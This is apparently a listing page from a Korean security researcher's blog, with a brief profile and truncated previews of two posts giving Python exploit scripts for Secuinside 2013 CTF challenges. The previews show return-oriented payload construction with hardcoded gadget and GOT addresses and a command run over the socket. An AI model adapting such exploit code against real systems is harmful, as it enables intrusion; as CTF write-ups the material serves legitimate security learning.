Profile 이름(Name) : 한충우 (Choongwoo Han)닉네임(Nickname): tunz B.S.: Computer Science and Engineering, Technology Management, in UNIST'15 Interests: Software Security, Software Testing, Program Analysis, Web Security Mail: cwhan.tunz |at| gmail.comBlog: http://blog.tunz.kr (-> http://tunz.kr )Twitter: http://www.twitter.com/7unzgithub: http://www.github.com/tunz 소속: KAIST SoftWare Testing & Verification (SWT.. 더보기 [secuinside 2013] debugd exploit ubuntu 13.10에서 재현 from socket import *from struct import *import time s = socket(AF_INET,SOCK_STREAM)s.connect(('localhost', 7744)) leaveret = 0x8048a68recv_plt = 0x8048770send_plt = 0x8048790bss = 0x804b080fake_ebp = bss+0x50send_got = 0x804b070ppppr = 0x804906c cmd = "id>&4\x00" payload = "1;"+"\x00"*(0x66c + 4 - 2)payload += pack(' 더보기 [Secuinside 2013] angry danbi exploit 우분투 12.04에서 재현 from socket import *from struct import *import time fputs_plt = 0x8048800fputs_got = 0x804B064recv_plt = 0x8048810send_plt = 0x8048830ppppr = 0x80499FCbss = 0x804c0dc cmd = "id>&4\x00" i=0while True: print "Send! %d" % i i += 1 s = socket(AF_INET, SOCK_STREAM) s.connect(('localhost',8080)) time.sleep(0.3) print s.recv(10000) #raw_input('go?') vmcode = "" # auth 2 vmcode += "#\x00\.. 더보기 이전 1 2 3 4 5 6 7 8 ··· 27 다음